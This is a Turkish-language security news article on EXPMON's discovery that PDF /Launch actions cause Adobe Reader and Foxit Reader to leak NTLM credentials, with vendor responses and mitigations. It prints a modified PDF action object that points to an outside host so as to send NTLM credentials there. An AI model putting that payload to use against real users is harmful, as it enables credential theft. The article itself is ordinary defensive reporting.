EXPMON’daki siber güvenlik araştırmacıları, PDF örneklerinde, saldırganlar tarafından hassas NTLM kimlik doğrulama verilerini sızdırmak amacıyla kullanılabilecek ilgi çekici bir “sıfır gün davranışını” ortaya çıkardı.
Keşif, Adobe Reader ve Foxit Reader’ın belirli PDF eylemlerini nasıl ele aldığındaki güvenlik açıklarını vurguluyor; ancak araştırmacılar, analiz edilen örneklerde davranışın kötü niyetle oluşturulduğunu gösteren hiçbir kanıt olmadığını vurguluyor.
EXPMON araştırmacıları, yıllar önce VirusTotal’a (VT) yüklenen PDF örneklerini incelerken, PDF’lerin kodlarında tanımlanan eylemleri yürütme biçiminde önceden bilinmeyen bir davranış tespit etti.
Özellikle, güvenlik açığı ne kadar spesifik olduğundan kaynaklanmaktadır. /Launch eylemler Adobe Reader ve Foxit Reader tarafından işlenir. Kötü niyetli bir aktör tarafından istismar edilmesi durumunda bu davranışlar, Windows ağlarında önemli bir kimlik doğrulama mekanizması olan NTLM bilgilerinin çalınmasına olanak tanıyabilir.
Analiz edilen örneklerden biri aşağıdaki önemli kod pasajını içeriyordu:
5 0 obj
<< /Type /Action
/S /Launch
/F (/Applications/Calculator.app/Contents/MacOS/Calculator)
>>
endobjBu kod bir işlemi başlatır /Launch Bir dosyayı veya uygulamayı açmak için tasarlanmış eylem. Ancak belirli yapılandırmalarda PDF okuyucuları tarafından işlendiğinde bu davranış yanlışlıkla NTLM bilgi sızıntılarını tetikler.
Investigate Real-World Malicious Links & Phishing Attacks With Threat Intelligence Lookup - Try for Free
Güvenlik Açığı Analizi
Adobe Okuyucu
PDF örneği Adobe Reader’da açıldığında uygulama “Uygulamalar” adlı bir ağ kaynağı bulmaya çalışır. Başarılı olursa, bir bağlantı başlatır ve kullanıcı bir uyarı mesajı görmeden önce NTLM kimlik bilgilerini sunucuya gönderir.
Bu davranış, saldırganların genel alan adlarını kullanmasına izin vermese de özel ağ ortamlarında bundan yararlanabilir. Kötü amaçlı aktörler, kötü amaçlı bir PDF oluşturarak ve saldırgan tarafından kontrol edilen bir yerel sunucu kullanarak kurbanlardan hassas NTLM bilgilerini toplayabilir.
Ancak Adobe, bu davranışı intranet etki alanlarıyla sınırlayan tasarım tercihlerini öne sürerek riski küçümsedi. Açıklamalarına göre:
“DNS/NTLM çağrıları internet alan adları için değil, yalnızca intranet alan adları için yapılır. Acrobat, ‘Win OS güvenlik bölgelerindeki sitelere otomatik olarak güven’ özelliği etkinleştirildiğinde intranet etki alanlarını güvenilir olarak kabul eder. Bu özellik Acrobat’ta varsayılan olarak etkindir.”
Foxit Okuyucu
Güvenlik açığı Foxit Reader’da farklı şekilde ortaya çıkıyor. Orijinal örnek NTLM sızıntısını tetiklemese de, /F (dosya yolu) alanı gibi bir kamu alanına referans vermek için pub.expmon.com yapmak. Örneğin, bu değiştirilmiş kod NTLM kimlik bilgilerini bir saldırgan tarafından kontrol edilen genel bir sunucuya sızdırabilir:
5 0 obj
<< /Type /Action
/S /Launch
/F (/pub.expmon.com/test)
>>
endobjKurbanlar değiştirilmiş PDF dosyasını açtıklarında, daha sonra bir uyarı görünse bile, NTLM kimlik bilgileri saldırganın genel sunucusuna gönderiliyor.
Foxit, Adobe’den farklı olarak bu davranışın güvenlik açısından sonuçlarını kabul etti ve Aralık 2024’te derhal bir yama yayınladı.
Satıcı Yanıtları
Adobe Okuyucu: Adobe, yalnızca intranet etki alanlarıyla sınırlı olduğundan, davranışın bir güvenlik sorunu olmadığını belirledi. Bu tasarım kararının, ağ kaynaklarının yönetimine yönelik güven modelleriyle uyumlu olduğunu vurguladılar.
Foxit Okuyucu: Foxit Software, keşfi meşru bir güvenlik açığı olarak ele aldı ve sorunu çözmek için yamalı bir sürüm olan Windows için Foxit PDF Reader v2024.4’ü yayınladı. Kullanıcıları en son sürümü indirmeye teşvik ettiler ve güvenlik bültenlerinde düzeltmeyi vurguladılar.
EXPMON’un bulguları, yaygın olarak kullanılan yazılımlarda gözden kaçan davranışların potansiyel risklerinin altını çiziyor.
Tanımlanan “sıfır gün davranışı” doğada aktif olarak kullanılmamış olsa da, bu güvenlik açıklarının ne kadar kolay bir şekilde silah haline getirilebileceğinin çarpıcı bir hatırlatıcısı olarak hizmet ediyor.
EXPMON, keşiflerinin, gözden kaçan veya bilinmeyen tehditleri belirlemede büyük veri analitiğinin (BDA) gücünü vurguladığını vurguladı. Ekip, BDA’dan yararlanarak dosyaları geriye dönük olarak analiz edebilir ve istismar tespit yeteneklerini geliştirebilir.
EXPMON yaptığı açıklamada şunları paylaştı: “Bu bulgu, BDA analizinin gücüne ve EXPMON’un neden en çok tespit edilemeyen dosya tabanlı sıfır gün istismarlarını tespit edebildiğine dair iyi bir örnek.”
- Adobe Reader Kullanıcıları için:
Adobe bu davranış için bir yama yayınlamamış olsa da kullanıcılar, Acrobat ayarlarında “Win OS güvenlik bölgelerindeki sitelere otomatik olarak güven” özelliğini devre dışı bırakarak riskleri azaltabilirler. - Foxit Reader Kullanıcıları için:
Kullanıcıların bu güvenlik açığına karşı koruma sağlamak için derhal Foxit Reader v2024.4 veya daha yüksek bir sürüme güncelleme yapmaları gerekmektedir.
Bu Haberi İlginç Bulun! Anında Güncellemeler Almak için Bizi Google Haberler, LinkedIn ve X’te Takip Edin